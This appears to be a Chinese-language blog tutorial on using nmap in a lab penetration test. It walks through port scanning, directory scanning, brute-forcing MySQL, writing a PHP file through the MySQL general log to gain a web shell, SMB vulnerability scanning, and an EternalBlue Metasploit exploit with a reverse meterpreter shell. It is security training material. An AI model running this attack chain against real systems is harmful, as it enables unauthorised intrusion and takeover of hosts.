nmap在渗透测试中的运用
Nmap 这个神器在渗透测试中是必不可少的。从信息收集到拿 shell。有时候还真少不了它!本文将要介绍 nmap 在渗透测试中,都有那些运用和测试手段。!(https://blog.bbskali.cn/usr/uploads/2020/07/2143118451.jpg)
### 一:利用 nmap 对目标进行信息收集
命令如下:
```bash
nmap -T4 -A 192.168.123.239
```
![对目标主机扫描结果](https://blog.bbskali.cn/usr/uploads/2020/07/1198260740.png)
从上图我们发现,目标是一台 `windows` 系统,并且开启了常见的 `80` `445 ` `3306` 等常见的端口。
### 二:对目标站点进行扫描
命令如下:
```bash
dirb http://192.168.123.239
```
![](https://blog.bbskali.cn/usr/uploads/2020/07/1044022330.png)
通过对目标站点分析,我们发现了一些敏感的文件目录。`phpMyAdmin` `include` 等等。
在第一步中,我们扫描到了 `3306` 端口,这也意味着目标可以远程登录数据库。
### 三:利用 nmap 暴力破解 MySQL
命令如下:
```bash
nmap -p 3306 --script=mysql-brute.nse 192.168.123.239
```
![](https://blog.bbskali.cn/usr/uploads/2020/07/3777035483.png)
如上,通过暴力破解,我们得到了账号和密码为 `root` 和 `123456`
### 四:尝试远程登录
命令如下:
```bash
mysql -h 192.168.123.239 -u root -p
```
成功登录数据库
![](https://blog.bbskali.cn/usr/uploads/2020/07/627367157.png)
### 利用 phpMyAdmin 拿 shell
在前期的文章中提到过,我们先登录到 phpMyAdin
![](https://blog.bbskali.cn/usr/uploads/2020/07/3648733911.png)
执行下面的 SQL 语句
```bash
SET GLOBAL GENERAL_log='on';
SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';
SELECT '<?php phpinfo(); ?>';
```
**需要注意的是,一定要写对目标的站点根目录的绝对地址**
执行完成后,会在更目录生成一个 `cmd.php` 文件,我们访问效果如下:
![](https://blog.bbskali.cn/usr/uploads/2020/07/2422831334.png)
利用此种方式,便可成功拿 shell。
### 五:利用 nmap 扫描目标主机漏洞
命令如下:
```bash
nmap -v--script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn
```
扫描结果如下:
![](https://blog.bbskali.cn/usr/uploads/2020/07/3415768538.png)
可以看到,目标存在 `ms17-010` `ms10-054` `CVE-2017-0143` 等漏洞。
### 六:配合 msfconsole 那些系统权限
命令如下:
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.123.66
set payload windows/x64/meterpreter/reverse_tcp
exploti
```
![](https://blog.bbskali.cn/usr/uploads/2020/07/677127488.png)
通过上诉示例,我们利用 nmap 从简单的信息收集到拿 shell。一次完整的渗透测试就完成了。 ::twemoji:smile::
kali学习
页:
[1]